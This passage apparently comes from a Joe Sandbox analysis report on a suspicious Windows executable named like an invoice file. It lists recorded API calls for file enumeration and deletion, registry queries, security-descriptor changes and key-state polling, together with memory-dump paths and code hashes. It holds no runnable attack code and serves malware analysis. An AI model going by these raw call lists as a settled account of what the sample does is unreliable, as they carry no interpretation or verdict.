                                                                                                                • __swprintf.LIBCMT ref: 004DF72E
                                                                                                                • __swprintf.LIBCMT ref: 004DF767
                                                                                                                • __swprintf.LIBCMT ref: 004DF7BB
                                                                                                                  • Part of subcall function 004B172B: __woutput_l.LIBCMT ref: 004B1784
                                                                                                                • __swprintf.LIBCMT ref: 004DF809
                                                                                                                • __swprintf.LIBCMT ref: 004DF858
                                                                                                                • __swprintf.LIBCMT ref: 004DF8A7
                                                                                                                • __swprintf.LIBCMT ref: 004DF8F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                • API String ID: 835046349-2428617273
                                                                                                                • Opcode ID: 805175138aeea86ccd50ee8398dad05f7a166a8beec258b05188aca1510f8d70
                                                                                                                • Instruction ID: b96a0a46482ec83b20580dcdcd7e7b2585c8242fba406cc9e37c0f3e4f887be1
                                                                                                                • Opcode Fuzzy Hash: 805175138aeea86ccd50ee8398dad05f7a166a8beec258b05188aca1510f8d70
                                                                                                                • Instruction Fuzzy Hash: 99A130B2408344ABC710EBA5C896DAFB7ECAF99704F40482FF595C3152EB38D949C766
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004E1B50
                                                                                                                • _wcscmp.LIBCMT ref: 004E1B65
                                                                                                                • _wcscmp.LIBCMT ref: 004E1B7C
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 004E1B8E
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 004E1BA8
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004E1BC0
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004E1BCB
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 004E1BE7
                                                                                                                • _wcscmp.LIBCMT ref: 004E1C0E
                                                                                                                • _wcscmp.LIBCMT ref: 004E1C25
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004E1C37
                                                                                                                • SetCurrentDirectoryW.KERNEL32(005439FC), ref: 004E1C55
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004E1C5F
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004E1C6C
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004E1C7C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1803514871-438819550
                                                                                                                • Opcode ID: fc98865f7b7e224a481c945f707847309676a5b37254517b982f4afe22c40420
                                                                                                                • Instruction ID: f8f27f8975d66f05802f48fd85eab52a6a6440b7ff3237a5394c7d752d1b1f1a
                                                                                                                • Opcode Fuzzy Hash: fc98865f7b7e224a481c945f707847309676a5b37254517b982f4afe22c40420
                                                                                                                • Instruction Fuzzy Hash: E531D5325802597FDF10AFB1DC49ADE77BCAF05325F104556E812D21A0EB78DB89CA68
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 004FF37A
                                                                                                                  • Part of subcall function 004FD7DE: ClientToScreen.USER32(?,?), ref: 004FD807
                                                                                                                  • Part of subcall function 004FD7DE: GetWindowRect.USER32(?,?), ref: 004FD87D
                                                                                                                  • Part of subcall function 004FD7DE: PtInRect.USER32(?,?,004FED5A), ref: 004FD88D
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004FF3E3
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004FF3EE
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004FF411
                                                                                                                • _wcscat.LIBCMT ref: 004FF441
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004FF458
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004FF471
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 004FF488
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 004FF4AA
                                                                                                                • DragFinish.SHELL32(?), ref: 004FF4B1
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 004FF59C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                • API String ID: 2166380349-3440237614
                                                                                                                • Opcode ID: 6dcc70e80ccf7e6d2f0f9568b314267cd1de8e43846a768a31f2c99d7645d527
                                                                                                                • Instruction ID: d2d6d6a506921209af5de0c41ca566819105f070dc4fabf9277b06c41848c68c
                                                                                                                • Opcode Fuzzy Hash: 6dcc70e80ccf7e6d2f0f9568b314267cd1de8e43846a768a31f2c99d7645d527
                                                                                                                • Instruction Fuzzy Hash: 14616C71008304AFC700EF65CC85EAFBBF8BF99714F004A2EF695961A1DB749909CB66
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004E1CAB
                                                                                                                • _wcscmp.LIBCMT ref: 004E1CC0
                                                                                                                • _wcscmp.LIBCMT ref: 004E1CD7
                                                                                                                  • Part of subcall function 004D6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004D6BEF
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004E1D06
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004E1D11
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 004E1D2D
                                                                                                                • _wcscmp.LIBCMT ref: 004E1D54
                                                                                                                • _wcscmp.LIBCMT ref: 004E1D6B
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004E1D7D
                                                                                                                • SetCurrentDirectoryW.KERNEL32(005439FC), ref: 004E1D9B
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004E1DA5
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004E1DB2
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004E1DC2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1824444939-438819550
                                                                                                                • Opcode ID: 29676bbf9cf051d415efe0527691d2afe594097923025f17fa5a832163f880f4
                                                                                                                • Instruction ID: d094c8759b5f86109397de1ee92adcd2434f56d3640d7b6b29bccea17c99bf3d
                                                                                                                • Opcode Fuzzy Hash: 29676bbf9cf051d415efe0527691d2afe594097923025f17fa5a832163f880f4
                                                                                                                • Instruction Fuzzy Hash: C83116325802597ACF10AFA1DC49EDE77BCAF05325F104557E811E22B0DB78EA49CA68
                                                                                                                APIs
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 004E09DF
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E09EF
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004E09FB
                                                                                                                • __wsplitpath.LIBCMT ref: 004E0A59
                                                                                                                • _wcscat.LIBCMT ref: 004E0A71
                                                                                                                • _wcscat.LIBCMT ref: 004E0A83
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004E0A98
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004E0AAC
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004E0ADE
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004E0AFF
                                                                                                                • _wcscpy.LIBCMT ref: 004E0B0B
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004E0B4A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 3566783562-438819550
                                                                                                                • Opcode ID: 99ea4e45895b8621e4d746a41e2cf55a8e71246c1954dea3b51dabad14edce87
                                                                                                                • Instruction ID: c11835a8beeda5072531bfdc6995486375224fa7bee8cd0d43d7d2b1019eef1b
                                                                                                                • Opcode Fuzzy Hash: 99ea4e45895b8621e4d746a41e2cf55a8e71246c1954dea3b51dabad14edce87
                                                                                                                • Instruction Fuzzy Hash: 0F618B725042459FCB10EF61C84099FB3E8FF89314F04492EF999C7252EB79E945CB96
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004FEF3B
                                                                                                                • GetFocus.USER32 ref: 004FEF4B
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004FEF56
                                                                                                                • _memset.LIBCMT ref: 004FF081
                                                                                                                • GetMenuItemInfoW.USER32 ref: 004FF0AC
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 004FF0CC
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 004FF0DF
                                                                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 004FF113
                                                                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 004FF15B
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004FF193
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 004FF1C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3616455698-4108050209
                                                                                                                • Opcode ID: 9919e61becf1b29b0c3d64858c67714e27484d2eb7b04c07bd22b8501a3bc584
                                                                                                                • Instruction ID: 2604649de1fe6f26e306c749459a0bb43b87cc80afebb1872ff86dc4f7f1b1d4
                                                                                                                • Opcode Fuzzy Hash: 9919e61becf1b29b0c3d64858c67714e27484d2eb7b04c07bd22b8501a3bc584
                                                                                                                • Instruction Fuzzy Hash: 12815871504309AFD720CF15C984ABBBBE9EF88314F00492EFA9597291D774DD09CBAA
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004CABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004CABD7
                                                                                                                  • Part of subcall function 004CABBB: GetLastError.KERNEL32(?,004CA69F,?,?,?), ref: 004CABE1
                                                                                                                  • Part of subcall function 004CABBB: GetProcessHeap.KERNEL32(00000008,?,?,004CA69F,?,?,?), ref: 004CABF0
                                                                                                                  • Part of subcall function 004CABBB: RtlAllocateHeap.NTDLL(00000000,?,004CA69F), ref: 004CABF7
                                                                                                                  • Part of subcall function 004CABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004CAC0E
                                                                                                                  • Part of subcall function 004CAC56: GetProcessHeap.KERNEL32(00000008,004CA6B5,00000000,00000000,?,004CA6B5,?), ref: 004CAC62
                                                                                                                  • Part of subcall function 004CAC56: RtlAllocateHeap.NTDLL(00000000,?,004CA6B5), ref: 004CAC69
                                                                                                                  • Part of subcall function 004CAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004CA6B5,?), ref: 004CAC7A
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004CA6D0
                                                                                                                • _memset.LIBCMT ref: 004CA6E5
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004CA704
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004CA715
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 004CA752
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004CA76E
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004CA78B
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004CA79A
                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 004CA7A1
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004CA7C2
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 004CA7C9
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004CA7FA
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004CA820
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004CA834
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2347767575-0
                                                                                                                • Opcode ID: 7856458b444fa16de4e4f12d272a304bf2a4bd3488d442d1edd55112e504abb6
                                                                                                                • Instruction ID: 8c0bbbdb7689505e961d5a44423d18808618491a31ca2b3c4208b3a10248e7ff
                                                                                                                • Opcode Fuzzy Hash: 7856458b444fa16de4e4f12d272a304bf2a4bd3488d442d1edd55112e504abb6
                                                                                                                • Instruction Fuzzy Hash: 69513C75900209ABDF10DF95DC48EEFBBB9FF04308F04812EE915A6290E739DA15DB65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$SSS S
                                                                                                                • API String ID: 0-428035616
                                                                                                                • Opcode ID: 46a06dd271c921a723602d1cca73c1185ca34a9307296943713104edf0adb497
                                                                                                                • Instruction ID: b8e377be13ad5c209a71bd1ee2e08a1cf7f871181d63f46fed73765c9263c3ab
                                                                                                                • Opcode Fuzzy Hash: 46a06dd271c921a723602d1cca73c1185ca34a9307296943713104edf0adb497
                                                                                                                • Instruction Fuzzy Hash: 29728171E142199BDF24CF59C8817EEBBB5BF48310F14816AE805EB281EB749E81DF94
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004D5FA6,?), ref: 004D6ED8
                                                                                                                  • Part of subcall function 004D72CB: GetFileAttributesW.KERNEL32(?,004D6019), ref: 004D72CC
                                                                                                                • _wcscat.LIBCMT ref: 004D6441
                                                                                                                • __wsplitpath.LIBCMT ref: 004D645F
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004D6474
                                                                                                                • _wcscpy.LIBCMT ref: 004D64A3
                                                                                                                • _wcscat.LIBCMT ref: 004D64B8
                                                                                                                • _wcscat.LIBCMT ref: 004D64CA
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 004D64DA
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004D64EB
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004D6506
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2643075503-1173974218
                                                                                                                • Opcode ID: afe68666dd2f0ef0516fd0ae885fcc179fc244ae7288d517ec831f7a78918096
                                                                                                                • Instruction ID: 7efd808c072c1dc68238f7680a8d555fe173a5e8caebe7305a75f79a671c9f35
                                                                                                                • Opcode Fuzzy Hash: afe68666dd2f0ef0516fd0ae885fcc179fc244ae7288d517ec831f7a78918096
                                                                                                                • Instruction Fuzzy Hash: 3B31B1B2408384AAC721DBA488959DBB7ECAF55304F40492FF5D9C3241EB39D50D87BB
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004F3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F328E
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004F332D
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004F33C5
                                                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004F3604
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004F3611
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1240663315-0
                                                                                                                • Opcode ID: aff1ae3c64b2ea2441e5a43e5e4f89c09441b4e7748ad9ff421fe906885f27d7
                                                                                                                • Instruction ID: 9793a90c26590665e4ca848d37d9ae8dd8d3e72b7573310ea46eb790755623df
                                                                                                                • Opcode Fuzzy Hash: aff1ae3c64b2ea2441e5a43e5e4f89c09441b4e7748ad9ff421fe906885f27d7
                                                                                                                • Instruction Fuzzy Hash: 5BE17C31604204AFCB14DF29C995D6BBBE8EF89314F04846EF94ACB2A1DB34ED05CB56
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 004D2B5F
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 004D2BE0
                                                                                                                • GetKeyState.USER32(000000A0), ref: 004D2BFB
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004D2C15
                                                                                                                • GetKeyState.USER32(000000A1), ref: 004D2C2A
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004D2C42
                                                                                                                • GetKeyState.USER32(00000011), ref: 004D2C54
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 004D2C6C
                                                                                                                • GetKeyState.USER32(00000012), ref: 004D2C7E
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 004D2C96
                                                                                                                • GetKeyState.USER32(0000005B), ref: 004D2CA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
